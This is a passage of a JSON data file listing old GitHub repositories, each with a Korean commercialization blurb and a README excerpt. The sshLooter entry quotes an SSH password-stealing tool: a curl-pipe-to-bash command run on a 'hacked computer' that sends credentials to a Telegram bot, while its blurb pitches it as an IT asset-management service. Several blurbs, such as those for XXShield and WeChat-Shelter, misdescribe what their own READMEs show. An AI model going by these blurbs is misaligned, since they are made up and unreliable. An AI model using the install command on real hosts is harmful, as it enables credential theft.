a","composite_score":0.3054,"license_safety_tag":"unknown"},{"name":"ValiantCat/XXShield","github_url":"https://github.com/ValiantCat/XXShield","stars":15,"language":"Objective-C","license":"apache-2.0","abandonment_months":78,"description":"# XXShield 저장소 분석\n\n## 왜 보물인가\n인터넷 사용 중 악성 콘텐츠로부터 사용자를 보호하는 방어막 역할을 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학교/회사에서 부적절한 웹사이트 접근을 차단하는 구독형 필터링 서비스\n2. **내부 업무 도구**: 기업 네트워크 관리자가 직원 인터넷 사용을 모니터링하고 제어하는 ","readme_excerpt":"\n[![CI Status](http://img.shields.io/travis/ValiantCat/XXShield.svg?style=flat)](https://travis-ci.org/ValiantCat/XXShield) [![Version](https://img.shields.io/cocoapods/v/XXShield.svg?style=flat)](http://cocoapods.org/pods/XXShield) [![License](https://img.shields.io/cocoapods/l/XXShield.svg?style=flat)](http://cocoapods.org/pods/XXShield) [![Platform](https://img.shields.io/cocoapods/p/XXShield.svg?style=flat)](http://cocoapods.org/pods/XXShield)\n\n\n<!--markdown-->\n<!-- toc -->\n\n\n# 前言 \n\n正在运行的 APP 突然 Crash，是一件令人不爽的事，会流失用户，影响公司发展，所以 APP 运行时拥有防 Crash 功能能有效降低 Crash 率，提升 APP 稳定性。但是有时候 APP Crash 是应有的表现，我们不让 APPCrash 可能会导致别的逻辑错误，不过我们可以抓取到应用当前的堆栈信息并上传至相关的服务器，分析并修复这些 BUG。\n\n所以本文介绍的 XXShield 库有两个重要的功能:\n\n1. 防止Crash\n2. 捕获异常状态下的崩溃信息\n\n类似的相关技术分析也有 [网易iOS App运行时Crash自动防护实践](https://mp.weixin.qq.com/s?__biz=MzA3ODg4MDk0Ng==&mid=2651113088&idx=1&sn=10b28d7fbcdf0def1a47113e5505728d&chksm=844c6f5db33be64b57fc9b4013cdbb7122d7791f3bbca9b4b29e80cce295eb341b03a9fc0f2f&mpshare=1&scene=23&srcid=0207njmGS2HWHI0BZ","composite_score":0.3053,"license_safety_tag":"safe"},{"name":"ks888/LambStatus","github_url":"https://github.com/ks888/LambStatus","stars":27,"language":"JavaScript","license":"apache-2.0","abandonment_months":75,"description":"# LambStatus 분석 보고서\n\n## 왜 보물인가\n회사나 서비스의 상태를 실시간으로 보여주는 상태판을 쉽게 만들고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 소프트웨어 회사가 자신의 서비스 장애 상황을 고객에게 투명하게 공지하는 상태판으로 운영\n2. **내부 업무 도구**: 회사 내부 시스템(","readme_excerpt":"# LambStatus\n\n[![Launch CloudFormation Stack](https://s3.amazonaws.com/cloudformation-examples/cloudformation-launch-stack.png)](https://console.aws.amazon.com/cloudformation/home#/stacks/new?stackName=StatusPage&templateURL=https://s3-ap-northeast-1.amazonaws.com/lambstatus/cf-template/0.6.6/lamb-status.yml)\n[![wercker status](https://app.wercker.com/status/fcb6fb7398629e934ae0538737021d14/s/master \"wercker status\")](https://app.wercker.com/project/byKey/fcb6fb7398629e934ae0538737021d14)\n[![API Document](https://img.shields.io/badge/api-v0-blue.svg)](https://lambstatus.github.io/apidocs/)\n\n*The project is now in the maintenance mode. Only critical bugs will be fixed, and there won’t be any more feature development. Also, the project will be archived after the end of February 2020. So please consider moving to other projects like [Cachet](https://github.com/CachetHQ/Cachet).*\n\nLambStatus is the serverless status page system. [See our website](https://lambstatus.github.io/) for features","composite_score":0.3053,"license_safety_tag":"safe"},{"name":"progrmoiz/python-snippets","github_url":"https://github.com/progrmoiz/python-snippets","stars":22,"language":"Python","license":"unknown","abandonment_months":46,"description":"# python-snippets 저장소 분석\n\n## 왜 보물인가\n파이썬 프로그래밍을 처음 배우는 사람들도 바로 사용할 수 있는 실무 코드 모음집입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 파이썬 초보자용 온라인 코딩 교육 플랫폼에서 학습 자료로 활용\n2. **내부 업무 도구**: 소프트웨어 개발사의 신입 사원 교육용 코드 샘플 라이브러","readme_excerpt":"# ![Python Snippets](./logo.png \"Python Snippets\")\nThese Snippets can make your life a lot easier than expected, use it wisely.\n\n---\n\n## Snippets TO LEARN\n\n- [string_import.py](string_import.py) example to show import module from string\n- [classtools.py](classtools.py) assorted class utilities and tools\n- [formats.py](formats.py) various specialized string display formatting utilities.\n- [mydir.py](mydir.py) a module that lists the namespaces of other module\n- [mymap.py](mymap.py) different ways of implementing map\n- [myzip.py](myzip.py) different ways of implementing zip\n- [permute.py](permute.py) implemented permute\n- [reloadall.py](reloadall.py) transitively reload nested module\n- [scramble.py](scramble.py) a iterable scrambler\n- [streams.py](streams.py) give me reader, writer and a converter\n- [timer.py](timer.py) Homegrown timing tools for function calls.\n- [timer2.py](timer2.py) Homegrown timing tools for function calls.\n- [timer3.py](timer3.py) Homegrown timing tools for functio","composite_score":0.3053,"license_safety_tag":"unknown"},{"name":"fideloper/TrustedProxy","github_url":"https://github.com/fideloper/TrustedProxy","stars":5,"language":"PHP","license":"mit","abandonment_months":29,"description":"# TrustedProxy 상용화 분석\n\n## 왜 보물인가\n웹 서비스의 보안을 담당하는 **신뢰할 수 있는 중간 관리자 역할**을 하는 작은 하지만 중요한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 협업 도구에서 사용자 신원을 안전하게 확인하는 기능\n2. **내부 업무 도구**: 대기업의 직원 관리 시스템에서 접근","readme_excerpt":"# Laravel Trusted Proxies\n\n[![Build Status](https://github.com/fideloper/TrustedProxy/workflows/Tests/badge.svg)](https://github.com/fideloper/TrustedProxy/actions) [![Total Downloads](https://poser.pugx.org/fideloper/proxy/downloads.png)](https://packagist.org/packages/fideloper/proxy)\n\n**Setting a trusted proxy allows for correct URL generation, redirecting, session handling and logging in Laravel when behind a reverse proxy such as a load balancer or cache.**\n\n---\n\n## Installation\n\n**Laravel 5.5+ comes with this package**. If you are using Laravel 5.5 or greater, you **do not** need to add this to your project separately.\n\n* [Laravel 5.5](https://laravel.com/docs/5.5/requests#configuring-trusted-proxies) Docs (`fideloper/proxy:~3.3`)\n* [Laravel 5.6](https://laravel.com/docs/5.6/requests#configuring-trusted-proxies) Docs (`fideloper/proxy:^4.0`)\n* [Laravel 5.7](https://laravel.com/docs/5.7/requests#configuring-trusted-proxies) Docs (`fideloper/proxy:^4.0`)\n* [Laravel 5.8](https://lar","composite_score":0.3053,"license_safety_tag":"safe"},{"name":"nagaban2/nn_dynamics","github_url":"https://github.com/nagaban2/nn_dynamics","stars":17,"language":"Jupyter Notebook","license":"unknown","abandonment_months":101,"description":"# nn_dynamics 저장소 분석\n\n## 왜 보물인가\n신경망이 학습하는 과정을 시각화하고 분석하는 도구로, AI 모델의 내부 작동을 이해하고 개선하려는 연구자와 개발자들에게 필수적인 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 대학이나 온라인 강의 서비스에서 학생들이 신경망 학습 과정을 직관적으로 이해하도록 돕는 시각화 도구로","readme_excerpt":"# Neural Network Dynamics for Model-Based Deep Reinforcement Learning with Model-Free Fine-Tuning\n\n[Arxiv Link](https://arxiv.org/abs/1708.02596)\n\n**Abstract**: Model-free deep reinforcement learning algorithms have been shown to be capable of learning a wide range of robotic skills, but typically require a very large number of samples to achieve good performance. Model-based algorithms, in principle, can provide for much more efficient learning, but have proven difficult to extend to expressive, high-capacity models such as deep neural networks. In this work, we demonstrate that medium-sized neural network models can in fact be combined with model predictive control (MPC) to achieve excellent sample complexity in a model-based reinforcement learning algorithm, producing stable and plausible gaits to accomplish various complex locomotion tasks. We also propose using deep neural network dynamics models to initialize a model-free learner, in order to combine the sample efficiency of mode","composite_score":0.3052,"license_safety_tag":"unknown"},{"name":"rabovik/RSSwizzle","github_url":"https://github.com/rabovik/RSSwizzle","stars":6,"language":"Objective-C","license":"mit","abandonment_months":82,"description":"# RSSwizzle 평가 분석\n\n## 왜 보물인가\niOS 앱 개발에서 복잡한 기능 수정 작업을 간단하게 만들어주는 유틸리티 도구로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: iOS 앱 개발사들을 위한 클라우드 기반 개발 도구 플랫폼으로 제공\n2. **내부 업무 도구**: 모바일 앱 개발팀이 자사 프로","readme_excerpt":"\n# RSSwizzle\nSafe method swizzling done right.\n\n## Motivation\n\nClassical method swizzling with `method_exchangeImplementations` is quite simple, but it has a lot of limitations:\n\n* It is safe only if swizzling is done in the `+load` method. If you need to swizzle methods during application's lifetime you should take into account that third-party code may do swizzling of the same method in another thread at the same time.\n* The swizzled method must be implemented by the class itself and not by superclasses. Workarounds by copying implementation from the superclass do not really work. Original implementation in the superclass must be fetched at the time of calling, not at the time of swizzling <sup>([1][774],[2][775])</sup>.\n* The swizzled method implementation must not rely on the `_cmd` argument. _(And generally you can not be sure in it <sup>([5][cmd])</sup>.)_\n* Naming conflicts are possible <sup>([3][SO])</sup>.\n\nFor more details see discussions in: [1][774], [2][775], [3][SO], [4][","composite_score":0.3052,"license_safety_tag":"safe"},{"name":"HelloChenJinJun/TestChat","github_url":"https://github.com/HelloChenJinJun/TestChat","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":103,"description":"# TestChat 저장소 분석\n\n## 왜 보물인가\n채팅 기능을 쉽게 만들 수 있는 기초 도구로, 앱이나 웹사이트에 메시지 주고받는 기능을 빠르게 추가하려는 개발자들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 시스템**: 회사 웹사이트에 실시간 고객 문의 창을 달아 상담사와 직접 대화 가능\n2. **사내 메신저 앱**: 직원들이 팀 내에","readme_excerpt":"一、简介\n\n  该款APP是一个后台基于bmob后端云的校园社交APP，后台采用bmob云存储技术。界面采用了谷歌的matrial design设计，框架基于MD+Rxjava+retrofit+MVP架构。\n到目前为止，已经完成的功能模块有单聊，群聊，附近人搜索，开心时刻，天气预报，朋友圈发表和个人信息编辑展示等7大功能模块。\n  \n  首先郑重声明下，该聊天功能的实现并不是调用官方的即时通讯API，而是本人自己结合官方提供的推送功能和实时同步的功能，按照自己的逻辑来实现的，所以内部聊天信息的逻辑处理过程源码是开放的，希望对想学习Android聊天框架的同学有所帮助。\n  \n  \n  \n   项目详解地址:http://www.jianshu.com/p/2d76430617ae\n\n二、screenshot\n\n   <image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170609-153556.jpg\n width=250 height=450>\n <image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/Screenshot_20170610-153501.jpg\n width=250 height=450>\n  <image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70611-240903.jpg\n width=250 height=450>\n  <image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-160929.jpg\n width=250 height=450>\n  <image src=https://github.com/HelloChenJinJun/TestChat/blob/master/screenshots/S70610-160840.jpg\n width=250 height=450>\n  <","composite_score":0.3052,"license_safety_tag":"safe"},{"name":"amireh/happypack","github_url":"https://github.com/amireh/happypack","stars":6,"language":"JavaScript","license":"mit","abandonment_months":70,"description":"# HappyPack 프로젝트 분석\n\n## 왜 보물인가\n웹 애플리케이션 개발 속도를 획기적으로 높여주는 도구로, 개발자의 작업 효율성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 도구 SaaS**: 소규모 개발팀이 구독하는 개발 자동화 플랫폼으로 월간 구독료 수익화\n2. **기업 내부 도구**: 대규모 IT회사의 개발팀이 자체 시","readme_excerpt":"# HappyPack [![Build Status](https://travis-ci.org/amireh/happypack.svg?branch=master)](https://travis-ci.org/amireh/happypack) [![codecov.io](https://codecov.io/github/amireh/happypack/coverage.svg?branch=master)](https://codecov.io/github/amireh/happypack?branch=master)\n\nHappyPack makes initial webpack builds faster by transforming files [in\nparallel](#how-it-works).\n\n> **Maintenance mode notice**\n>\n> My interest in the project is fading away mainly because I'm not using\n> JavaScript as much as I was in the past. Additionally, Webpack's native\n> performance is improving and (I hope) it will soon make this plugin\n> unnecessary.\n>\n> See the FAQ entry about Webpack 4 and [thread-loader][thread-loader].\n>\n> Contributions are always welcome. Changes I make from this point will be\n> restricted to bug-fixing. If someone wants to take over, feel free to get\n> in touch.\n>\n> Thanks to everyone who used the library, contributed to it and helped in\n> refining it!!!\n\n## Usage\n\n```shell\nnpm instal","composite_score":0.3052,"license_safety_tag":"safe"},{"name":"YGYOOO/WeChat-Shelter","github_url":"https://github.com/YGYOOO/WeChat-Shelter","stars":6,"language":"CSS","license":"unknown","abandonment_months":74,"description":"# WeChat-Shelter 저장소 분석\n\n## 왜 보물인가\nWeChat(중국 최대 메신저)과 연동되는 긴급 대피소 정보 제공 시스템으로, 재난 상황에서 즉시 대피처를 찾아주는 생명 구조 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 지자체·재난 담당 공무원이 구독하여 주민들에게 실시간 대피소 정보 전송\n2. **내부 업무 도구**","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/YGYOOO/WeChat-Shelter/master/project/images/128.png\" width=\"70\">    \n\nchrome插件，把网页微信伪装成云笔记！   \n（纳尼，我无聊时花2小时写着搞笑的，没想到这么多star，感谢感谢(￣▽￣)。大家可以用来练手入门chrome插件开发，如果用来不好好工作学习别怪我（￣へ￣）） \n       \n      \n>求关注，以后更新更多好玩的东西(￣▽￣)    \n[![](https://img.shields.io/github/followers/YGYOOO.svg?label=Follow&style=social)](https://github.com/YGYOOO)\n[![](https://img.shields.io/badge/Follow%20@卧槽竟然是YGY的微博--brightgreen.svg?logo=Sina%20Weibo&style=social)](https://weibo.com/u/5352731024)\n[![](https://img.shields.io/badge/Follow%20@YGYOOO--brightgreen.svg?logo=Twitter&style=social)](https://twitter.com/YGYOOO)     \n     \n> 另推荐一个适合开发人员用的chrome插件，可以拦截并修改页面上的ajax请求：[ajax-interceptor](https://github.com/YGYOOO/ajax-interceptor)   \n\n## 使用效果\n<img src=\"https://raw.githubusercontent.com/YGYOOO/WeChat-Shelter/master/imgs/示例.jpg\" width=\"800\"> \n\n\n## 简易安装\nchrome商店直接安装：https://chrome.google.com/webstore/detail/悄悄上微信/ecmnkaldejeaaffaehobmhapkhnicnke\n\n\n## 其它安装方法\n方法1：   \n下载[WeChat-She","composite_score":0.3051,"license_safety_tag":"unknown"},{"name":"zeit/micro","github_url":"https://github.com/zeit/micro","stars":10,"language":"TypeScript","license":"mit","abandonment_months":24,"description":"# zeit/micro 분석 보고서\n\n## 왜 보물인가\n웹 서비스를 매우 간단하고 빠르게 만들 수 있는 경량 도구로, 개발자들이 복잡한 설정 없이 바로 서비스를 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 빠른 프로토타입 개발이 필요한 스타트업의 MVP(최소 기능 제품) 개발 플랫폼\n- **내부 업무 도구**: 회사 내","readme_excerpt":"# Micro — Asynchronous HTTP microservices\n\n## Features\n\n- **Easy**: Designed for usage with `async` and `await`\n- **Fast**: Ultra-high performance (even JSON parsing is opt-in)\n- **Micro**: The whole project is ~260 lines of code\n- **Agile**: Super easy deployment and containerization\n- **Simple**: Oriented for single purpose modules (function)\n- **Standard**: Just HTTP!\n- **Explicit**: No middleware - modules declare all [dependencies](https://github.com/amio/awesome-micro)\n- **Lightweight**: With all dependencies, the package weighs less than a megabyte\n\n**Disclaimer:** Micro was created for use within containers and is not intended for use in serverless environments. For those using Vercel, this means that there is no requirement to use Micro in your projects as the benefits it provides are not applicable to the platform. Utility features provided by Micro, such as `json`, are readily available in the form of [Serverless Function helpers](https://vercel.com/docs/runtimes#official-ru","composite_score":0.3051,"license_safety_tag":"safe"},{"name":"zxdefying/pytorch_tricks","github_url":"https://github.com/zxdefying/pytorch_tricks","stars":77,"language":"","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"\n\n写在前面：\n\n前段时间我将使用 `PyTorch` 的过程中总结的一些小trick发到 [知乎](<https://zhuanlan.zhihu.com/p/76459295>) 上，突然就得到很多人点赞，非常感谢大家的认可。\n\n有人评论可以转到github上，这样大家可以一起在上面分享自己的使用心得，我觉得这个主意不错，因为我个人接触面有限，总结不是很全面，如果大家群策群力，肯定能得到更好的结果。\n\n啰嗦结束。\n\n\n\n\n\n## pytorch_tricks\n\n\n\n**目录：**\n\n1. **指定GPU编号**\n2. **查看模型每层输出详情**\n3. **梯度裁剪**\n4. **扩展单张图片维度**\n5. **独热编码**\n6. **防止验证模型时爆显存**\n7. **学习率衰减**\n8. **冻结某些层的参数**\n9. **对不同层使用不同学习率**\n10. **模型相关操作**\n11. **Pytorch内置one hot函数**  \n12. **网络参数初始化**  \n\n\n\n\n### 1、指定GPU编号\n\n- 设置当前使用的GPU设备仅为0号设备，设备名称为 `/gpu:0`：`os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"`\n- 设置当前使用的GPU设备为0,1号两个设备，名称依次为 `/gpu:0`、`/gpu:1`： `os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"` ，根据顺序表示优先使用0号设备,然后使用1号设备。\n\n指定GPU的命令需要放在和神经网络相关的一系列操作的前面。\n\n\n\n\n\n### 2、查看模型每层输出详情\n\nKeras有一个简洁的API来查看模型的每一层输出尺寸，这在调试网络时非常有用。现在在PyTorch中也可以实现这个功能。\n\n使用很简单，如下用法：\n\n```python3\nfrom torchsummary import summary\nsummary(your_model, input_size=(channels, H, W))\n```\n\n`input_size` 是根据你自己的网络模型的输入尺寸进行设置。\n\n[**pytorch-summary**](https://link.zhihu.com/?target=https%3A//github.c","composite_score":0.3051,"license_safety_tag":"unknown"},{"name":"deepmind/pycolab","github_url":"https://github.com/deepmind/pycolab","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":82,"description":"# Pycolab 저장소 분석\n\n## 왜 보물인가\n게임처럼 보이는 화면에서 인공지능이 게임을 배우고 플레이할 수 있게 해주는 도구로, 로봇이나 게임 AI 개발 분야에서 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 게임 회사나 교육 플랫폼이 웹 기반 AI 학습 시뮬레이터를 구독형으로 제공\n2. **내부 업무 도구**: 대학교 ","readme_excerpt":"# The `pycolab` game engine.\n\nA highly-customisable gridworld game engine with some batteries included.\nMake your own gridworld games to test reinforcement learning agents!\n\n## Play some games!\n\nIf you're new, why not try playing some games first? For the full colour\nexperience on most UNIX-compatible systems:\n\n  1. crack open a nice, new, modern terminal (iterm2 on Mac, gnome-terminal or\n     xterm on linux). (Avoid screen/tmux for now---just the terminal, please.)\n  2. set the terminal type to `xterm-256color` (usually, you do this by typing\n     `export TERM=xterm-256color` at the command prompt).\n  3. run the example games! One easy way is to cd to just above the `pycolab/`\n     library directory (that is, cd to the root directory of the git repository\n     or the distribution tarball, if you're using either of those) and run\n     python with the appropriate `PYTHONPATH` environment variable. Example\n     command line for `bash`-like shells:\n     `PYTHONPATH=. python -B pycolab/exa","composite_score":0.305,"license_safety_tag":"safe"},{"name":"xxxyanchenxxx/QqDecrpt","github_url":"https://github.com/xxxyanchenxxx/QqDecrpt","stars":7,"language":"Java","license":"unknown","abandonment_months":103,"description":"# QqDecrpt 프로젝트 분석\n\n## 왜 보물인가\nQQ 메신저의 암호화된 메시지를 복호화할 수 있는 기술로, 대량의 채팅 데이터를 분석하거나 보안 감시가 필요한 조직에 유용합니다.\n\n## 어디에 쓸 수 있나\n- **기업용 감시 서비스**: 직원의 회사 채팅 기록을 법적으로 검토하는 컴플라이언스 도구\n- **보안 분석 API**: 보안팀이 위협 탐지를 위","readme_excerpt":"# QqDecrpt\nAndroid QQ 数据库解密算法\n\n## Note:\n不想编译的可以下载demo.apk运行测试，默认会读取/sdcard/qq.db进行解密。\n需要注意的是APP需要在应用里面授予sdcard读写权限，别忘了！\n\n运行效果:\n![image](https://github.com/xxxyanchenxxx/QqDecrpt/blob/master/demo.png)\n\n\nDemo App UI:\n\n![image](https://github.com/xxxyanchenxxx/QqDecrpt/blob/master/app.png)\n","composite_score":0.305,"license_safety_tag":"unknown"},{"name":"unconed/mathbox","github_url":"https://github.com/unconed/mathbox","stars":6,"language":"JavaScript","license":"mit","abandonment_months":37,"description":"# mathbox 상용화 분석\n\n## 왜 보물인가\n수학 개념을 마치 현실처럼 3차원으로 시각화해서 보여주는 도구로, 교육과 설명이 필요한 모든 분야에서 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 수학·물리 강의 영상에 3D 그래프와 수식을 실시간으로 렌더링하는 기능 판매\n2. **엔지니어링 설계 도구**: 건축가","readme_excerpt":"# MathBox\n\n[![NPM Package][npm]][npm-url]\n[![Build Status][build-status]][build-status-url]\n[![License][license]][license-url]\n\n### Presentation-quality WebGL math graphing\n\n![MathBox](http://acko.net/files/mathbox2/cover1.jpg)\n\nMathBox is a library for rendering presentation-quality math diagrams in a\nbrowser using WebGL. Built on top of [Three.js][three-url] and\n[ShaderGraph][shadergraph-url] it provides a clean API to visualize mathematical\nrelationships and animate them declaratively.\n\nFor background, see the [article series on\nAcko.net](http://acko.net/blog/mathbox2/).\n\n**Presentations**:\n\n- [The Pixel Factory](http://acko.net/files/gltalks/pixelfactory/online.html#0)\n\n**Demos**:\n\n- [Audio Visualizer](https://mathbox.org/demo/audio-visualizer.html) ([code](https://github.com/unconed/mathbox/blob/master/examples/demo/audio-visualizer.html))\n- [Cylindrical Stream](https://mathbox.org/demo/cylindrical-stream.html) ([code](https://github.com/unconed/mathbox/blob/master/examples/demo/c","composite_score":0.305,"license_safety_tag":"safe"},{"name":"googlecreativelab/paper-signals","github_url":"https://github.com/googlecreativelab/paper-signals","stars":30,"language":"C++","license":"apache-2.0","abandonment_months":33,"description":"# Paper Signals 상용화 분석\n\n## 왜 보물인가\nGoogle Creative Lab이 만든 이 프로젝트는 물리적 종이 기반의 스마트 신호 시스템으로, 일반인도 직관적으로 데이터를 시각화하고 모니터링할 수 있는 혁신적인 방식을 제시합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 주식/암호화폐 가격 변동을 물리적 신호로 표시하는","readme_excerpt":"<table>\n  <tr>\n    <td>\n      This project is no longer actively maintained by the Google Creative Lab but remains here in a read-only Archive mode so that it can continue to assist developers that may find the examples helpful. We aren’t able to address all pull requests or bug reports but outstanding issues will remain in read-only mode for reference purposes. Also, please note that some of the dependencies may not be up to date and there hasn’t been any QA done in a while so your mileage may vary.\n      <br><br>\n      For more details on how Archiving affects Github repositories see <a href=\"https://docs.github.com/en/github/creating-cloning-and-archiving-repositories/about-archiving-repositories\">this documentation </a>.\n      <br><br>\n      <b>We welcome users to fork this repository</b> should there be more useful, community-driven efforts that can help continue what this project began.\n    </td>\n  </tr>\n</table>\n\n\n# Paper Signals\nPaper Signals is a [Voice Experiment](https://exp","composite_score":0.305,"license_safety_tag":"safe"},{"name":"gatsbyjs/gatsby-starter-blog","github_url":"https://github.com/gatsbyjs/gatsby-starter-blog","stars":10,"language":"JavaScript","license":"0BSD","abandonment_months":0,"description":"# gatsby-starter-blog 보물 평가\n\n## 왜 보물인가\n블로그를 만들고 싶은 누구나 복잡한 코딩 없이 전문적인 웹사이트를 빠르게 시작할 수 있는 템플릿입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 블로그 호스팅 플랫폼 - 사용자가 이 템플릿으로 블로그를 만들고 월 구독료를 받기\n2. **내부 업무 도구**: 회사 뉴스레터","readme_excerpt":"<!-- AUTO-GENERATED-CONTENT:START (STARTER) -->\n<p align=\"center\">\n  <a href=\"https://www.gatsbyjs.com\">\n    <img alt=\"Gatsby\" src=\"https://www.gatsbyjs.com/Gatsby-Monogram.svg\" width=\"60\" />\n  </a>\n</p>\n<h1 align=\"center\">\n  Gatsby's blog starter\n</h1>\n\nKick off your project with this blog boilerplate. This starter ships with the main Gatsby configuration files you might need to get up and running blazing fast with the blazing fast app generator for React.\n\n_Have another more specific idea? You may want to check out our vibrant collection of [official and community-created starters](https://www.gatsbyjs.com/docs/gatsby-starters/)._\n\n## 🚀 Quick start\n\n1.  **Create a Gatsby site.**\n\n    Use the Gatsby CLI ([install instructions](https://www.gatsbyjs.com/docs/tutorial/getting-started/part-0/#gatsby-cli)) to create a new site, specifying the blog starter.\n\n    ```shell\n    # create a new Gatsby site using the blog starter\n    gatsby new my-blog-starter https://github.com/gatsbyjs/gatsby-s","composite_score":0.305,"license_safety_tag":"safe"},{"name":"marmelab/admin-on-rest","github_url":"https://github.com/marmelab/admin-on-rest","stars":10,"language":"JavaScript","license":"mit","abandonment_months":95,"description":"# admin-on-rest 상업화 분석\n\n## 왜 보물인가\n복잡한 관리자 페이지를 쉽게 만들 수 있는 도구라서, 소규모 팀도 전문 개발자 없이 업무용 웹사이트를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객이 자신의 데이터를 관리하는 대시보드 (예: 온라인 쇼핑몰 판매자용 관리 시스템)\n2. **내부 업무 도구**: ","readme_excerpt":"# admin-on-rest [![Build Status](https://travis-ci.org/marmelab/admin-on-rest.svg?branch=master)](https://travis-ci.org/marmelab/admin-on-rest)\n\nA frontend Framework for building admin applications running in the browser on top of REST services, using ES6, [React](https://facebook.github.io/react/) and [Material Design](https://material.io/). Open sourced and maintained by [marmelab](https://marmelab.com/).\n\n---\n\n**Admin-on-rest 1.x is in maintenance mode. Version 2.x lives at [https://github.com/marmelab/react-admin](https://github.com/marmelab/react-admin).**\n\n--- \n[Demo](https://marmelab.com/admin-on-rest-demo/) - [Documentation](https://marmelab.com/admin-on-rest/) - [Releases](https://github.com/marmelab/admin-on-rest/releases) - [Support](http://stackoverflow.com/questions/tagged/admin-on-rest)\n\n[![admin-on-rest-demo](https://marmelab.com/admin-on-rest/img/admin-on-rest-demo-still.png)](https://vimeo.com/205118063)\n\n## Features\n\n* Adapts to any REST backend\n* Complete documentati","composite_score":0.305,"license_safety_tag":"safe"},{"name":"mthbernardes/sshLooter","github_url":"https://github.com/mthbernardes/sshLooter","stars":7,"language":"Shell","license":"unknown","abandonment_months":90,"description":"# sshLooter 분석 보고서\n\n## 왜 보물인가\n원격 컴퓨터에 저장된 민감한 접근 정보를 자동으로 수집하는 도구로, 시스템 관리자나 보안 감시 용도에 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 자산 관리 SaaS**: 수천 개 서버의 접근 권한을 중앙에서 감시하고 정리하는 클라우드 서비스\n2. **내부 보안 감사 도구**: 회사 ","readme_excerpt":"# DON'T USE THIS\nThere's a C version which is much better [sshLooterC](https://github.com/mthbernardes/sshLooterC)\n\n# sshLooter\nScript to steal passwords from ssh.\n\n# Install\n<pre>\ngit clone https://github.com/mthbernardes/sshLooter.git\ncd sshLooter\n</pre>\n\n# Configuration\n<pre>\nEdit the script on install.sh, and add your telegram bot api, and your userid.\nCall the @botfather on telegram to create a bot and call the @userinfobot to get your user id.\n</pre>\n\n# Usage\n<pre>\nOn your server execute.\npython -m SimpleHTTPServer\n\nOn the hacked computer execute.\ncurl http://yourserverip:8000/install.sh | bash\n</pre>\n\n# Original script from\n<a href=\"http://www.chokepoint.net/2014/01/more-fun-with-pam-python-failed.html\" target=\"_blank\">ChokePoint</a>\n\n# My post about this script\n<a href=\"https://mthbernardes.github.io/persistence/2018/02/10/stealing-ssh-credentials-another-approach.html\" target=\"_blank\">Stealing SSH credentials Another Approach.</a>\n","composite_score":0.305,"license_safety_tag":"unknown"},{"name":"zhoushaw/Instagram","github_url":"https://github.com/zhoushaw/Instagram","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# Instagram 저장소 분석 보고서\n\n## 왜 보물인가\nInstagram처럼 사진을 공유하고 좋아요를 받을 수 있는 간단한 소셜 앱을 직접 만들 수 있는 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업이 자체 브랜드 사진 공유 플랫폼을 운영할 때 기반 기술로 활용\n2. **내부 업무 도구**: 회사 직원들이 프로젝","readme_excerpt":"\n## Introduction\n\n[中文简介](./README_ZH.md)\n\n> Create your own instagram!\n\n> Technology stack\n\n- react buckets of\n- ant design\n- egg.js\n- mysql\n\nBefore and after the end of the separation of development mode, the front-end and back-end projects belong to different projects\n\n```javascript\n// instagram/client The front-end engineering\n// instagram/service The backend engineering\n```\n\nNote: this project is purely personal fiddle, have nothing to do with them.\n\n## Features screenshots\n\n> The login\n\n<img src=\"https://s10.mogucdn.com/mlcdn/c45406/181201_4bge1k2c4l22ec994hjb496digb2f_419x264.gif\" width=\"665\" height=\"369\"/> \n\n> Focus on\n\n<img src=\"https://s10.mogucdn.com/mlcdn/c45406/181201_874ecg16jfkb8elck42lkg753jhgk_600x377.gif\" width=\"665\" height=\"369\">\n\n> Posting\n\n<img src=\"https://s10.mogucdn.com/mlcdn/c45406/181201_8g2fe66115ijhi5i33iik23i2e2ff_419x264.gif\" width=\"665\" height=\"369\">\n\n<!-- <img src=\"https://s10.mogucdn.com/mlcdn/c45406/181201_52hiflj1l28a6692j8abak6k6i76j_419x264.gif\" widt","composite_score":0.305,"license_safety_tag":"unknown"},{"name":"fossasia/2016.fossasia.org","github_url":"https://github.com/fossasia/2016.fossasia.org","stars":11,"language":"CSS","license":"unknown","abandonment_months":68,"description":"# fossasia/2016.fossasia.org 분석\n\n## 왜 보물인가\n2016년 FOSS Asia 컨퍼런스 웹사이트로, 대규모 기술 행사의 온라인 인프라 구축 및 운영 경험이 담겨있는 실제 사례입니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 관리 SaaS**: 행사 일정, 연사 정보, 참가자 등록을 한곳에서 관리하는 